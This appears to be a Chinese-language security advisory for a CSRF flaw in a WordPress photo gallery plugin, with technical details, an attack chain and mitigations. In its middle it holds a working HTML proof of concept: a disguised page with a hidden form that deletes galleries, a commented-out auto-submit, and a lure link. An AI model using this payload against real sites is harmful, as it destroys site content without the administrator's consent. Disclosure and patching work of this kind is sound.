CVE-2025-13685 WordPress Photo Gallery插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13685

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Photo Gallery by Ays WordPress Plugin

漏洞概述

CVE-2025-13685是WordPress平台Photo Gallery by Ays插件中的一个跨站请求伪造(CSRF)安全漏洞。该插件是一款广泛使用的WordPress图库管理插件，在全球拥有大量安装用户。漏洞存在于插件的批量操作(bulk action)功能中，由于缺少必要的CSRF令牌(nonce)验证，攻击者可以构造恶意请求，诱骗已登录的管理员用户执行非预期的操作。攻击者利用此漏洞可以批量删除、发布或取消发布图库内容，对网站的完整性和可用性造成影响。虽然该漏洞需要用户交互才能利用(管理员需点击攻击者提供的链接)，但由于WordPress管理员通常具有较高权限，此漏洞仍需引起重视并及时修复。

技术细节

该漏洞的根本原因在于Photo Gallery by Ays插件的process_bulk_action()函数缺少WordPress标准的nonce验证机制。在WordPress插件开发中，nonce验证是防止CSRF攻击的标准做法，通过wp_verify_nonce()函数验证请求的合法性。然而，受影响版本(6.4.8及以下)在处理批量操作请求时直接执行数据库操作，未对请求来源进行有效性验证。攻击者可以构造包含恶意参数的POST请求，欺骗已登录管理员执行以下操作：1)批量删除图库(gallery)；2)批量发布图库；3)批量取消发布图库。漏洞文件位于includes/lists/class-gallery-photo-gallery-list-table.php第1060行附近。攻击者需要诱骗管理员点击特制链接或访问包含恶意表单的页面，利用浏览器的Cookie自动发送机制完成攻击。修复版本6.4.9通过在process_bulk_action()函数中添加正确的nonce验证解决了此问题。

攻击链分析

STEP 1

1

攻击者创建恶意页面，包含针对WordPress Photo Gallery插件批量操作功能的CSRF攻击代码

STEP 2

2

攻击者通过钓鱼邮件、社交工程或其他方式诱骗WordPress管理员访问恶意页面或点击特制链接

STEP 3

3

管理员浏览器自动向目标WordPress站点发送带有有效管理员Cookie的POST请求

STEP 4

4

由于插件缺少nonce验证，请求被服务器接受并执行批量操作(删除/发布/取消发布图库)

STEP 5

5

攻击者成功修改、删除或干扰网站图库内容，造成数据损坏或服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13685: Photo Gallery by Ays Bulk Action CSRF -->
<!-- This PoC demonstrates how an attacker can force admin to delete galleries -->

<!DOCTYPE html>
<html>
<head>
    <title>Gallery Management</title>
</head>
<body>
    <h1>WordPress Admin Dashboard</h1>
    <p>Click the button below to manage your galleries:</p>
    
    <!-- Hidden form that auto-submits to perform bulk delete -->
    <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin.php" method="POST" style="display:none;">
        <input type="hidden" name="page" value="gallery-photo-gallery">
        <input type="hidden" name="action" value="-1">
        <input type="hidden" name="paged" value="1">
        <input type="hidden" name="action2" value="-1">
        
        <!-- Bulk action: delete selected galleries (IDs 1, 2, 3) -->
        <input type="hidden" name="action" value="delete">
        <input type="hidden" name="gallery[]" value="1">
        <input type="hidden" name="gallery[]" value="2">
        <input type="hidden" name="gallery[]" value="3">
        
        <!-- WordPress security nonce (MISSING in vulnerable version) -->
        <!-- <input type="hidden" name="_wpnonce" value="VALID_NONCE"> -->
    </form>
    
    <button type="button" onclick="document.getElementById('csrfForm').submit();">
        Update Gallery Settings
    </button>
    
    <script>
        // Auto-submit form after page load (for stealthier attack)
        // window.onload = function() { document.getElementById('csrfForm').submit(); };
    </script>
</body>
</html>

<!-- Alternative: Direct link-based PoC -->
<!-- 
<a href="http://target-wordpress-site/wp-admin/admin.php?page=gallery-photo-gallery&action=delete&gallery[]=1&gallery[]=2">
    Click here for free gift
</a>
-->

影响范围

Photo Gallery by Ays <= 6.4.8 (all versions up to and including 6.4.8)

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1)临时禁用图库的批量操作功能；2)加强对管理员账户的安全管理，使用强密码和双因素认证；3)对管理员进行安全意识培训，提高对钓鱼攻击和可疑链接的警惕性；4)使用Web应用防火墙(WAF)规则限制异常的批量操作请求；5)监控管理员操作日志，及时发现异常行为。建议在条件允许时尽快完成版本升级以彻底消除该安全风险。